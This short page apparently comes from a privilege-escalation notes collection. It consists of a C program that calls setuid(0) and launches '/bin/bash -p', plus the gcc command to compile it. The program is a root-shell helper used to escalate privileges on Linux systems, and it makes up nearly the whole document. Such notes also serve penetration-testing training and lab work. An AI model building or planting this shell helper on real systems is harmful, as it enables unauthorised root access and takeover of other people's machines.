For the complete documentation index, see llms.txt. This page is also available as Markdown.

Custom Executable

Compile a custom executable

######## Code ########
int main() {
    setuid(0);
    system("/bin/bash -p");
}

######## Compile ########
gcc -o myfile myfile.c

Last updated